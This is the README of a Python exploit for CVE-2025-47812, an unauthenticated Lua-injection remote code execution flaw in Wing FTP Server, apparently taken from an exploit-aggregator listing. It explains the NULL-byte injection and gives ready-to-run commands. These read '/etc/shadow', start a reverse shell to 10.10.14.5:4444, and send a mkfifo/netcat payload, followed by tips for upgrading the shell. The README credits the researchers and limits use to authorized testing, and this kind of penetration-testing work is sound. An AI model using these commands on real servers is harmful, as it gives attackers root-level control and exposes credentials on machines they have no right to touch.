Share
## https://sploitus.com/exploit?id=C72BF890-3768-5EDE-9C8C-FD5A92AE9042
# CVE-2025-47812 โ€” Wing FTP Server Unauth RCE (rewrite)

Python exploit for the unauthenticated Lua-injection RCE in Wing FTP Server โ‰ค 7.4.3. Designed for shell delivery โ€” one command from `check` to a working netcat callback.

> Written some time ago for wingData lab on HTB and open-sourced now. Use only against systems you own or have written permission to test.

## Credits

- **Vulnerability research:** Julien (@MrTuxracer) โ€” [What the NULL?! Wing FTP Server RCE (CVE-2025-47812)](https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/)
- **Original PoC:** @4m3rr0r โ€” [github.com/4m3rr0r/CVE-2025-47812-poc](https://github.com/4m3rr0r/CVE-2025-47812-poc)
- **This repo:** a rewrite of the above PoC which is slightly more functional and easier to use.

## Vulnerability summary

Wing FTP's `c_CheckUser()` truncates the `username` at the first NULL byte for authentication, but the session-creation path writes the *full* unsanitized username into a Lua session file. Inject `anonymous%00]]--` and the server happily writes your Lua into the session. Hitting any authenticated endpoint (`dir.html` works) loads that session file via `loadfile()` โ†’ `f()`, executing the injected code as `root` / `SYSTEM`.

Affected: Wing FTP Server โ‰ค 7.4.3. Fixed in 7.4.4.

## Install

```bash
pip install requests
```

That's it โ€” no other dependencies.

## Usage

```bash
# 1. Confirm the target is vulnerable (runs `id` and checks for `uid=`)
python3 exploit.py -u http://target:5466/ check

# 2. One-off command โ€” captures stdout AND stderr
python3 exploit.py -u http://target:5466/ exec "id"
python3 exploit.py -u http://target:5466/ exec "cat /etc/shadow"
python3 exploit.py -u http://target:5466/ exec "find / -perm -4000 2>/dev/null"

# 3. Reverse shell (the easy path)
#    Terminal 1:
nc -lvnp 4444
#    Terminal 2:
python3 exploit.py -u http://target:5466/ shell 10.10.14.5 4444

# 4. Detached arbitrary payload โ€” fire-and-forget. Useful when bash is missing:
python3 exploit.py -u http://target:5466/ detached \
  "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f"
```

### Flags

| Flag | Default | Purpose |
|------|---------|---------|
| `-u`, `--url` | required | Target base URL โ€” Wing FTP usually listens on `:5466` (HTTP) or `:5467` (HTTPS). |
| `-U`, `--username` | `anonymous` | Username before the NULL byte. Anonymous works on default installs. |
| `-P`, `--password` | empty | Password for the injection POST. Empty is fine for anonymous. |
| `-v`, `--verbose` | off | Dumps the Lua payload, URLs hit, and raw response body. |

### Tips

- Verify the port first. The web UI is **not** on 80 by default โ€” try `http://target:5466/login.html` in a browser before assuming the URL is wrong.
- If `shell` mode doesn't land a callback, fall back to `detached` with the `mkfifo` payload above. Some minimal Linux images don't ship `bash`.
- Upgrade the caught shell once it lands:
  ```bash
  python3 -c 'import pty;pty.spawn("/bin/bash")'
  # Ctrl+Z
  stty raw -echo; fg
  # Enter, Enter
  export TERM=xterm
  ```

## Disclaimer

For educational use and authorized security testing only. You are responsible for the targets you point this at.

## License

MIT โ€” see [LICENSE](./LICENSE).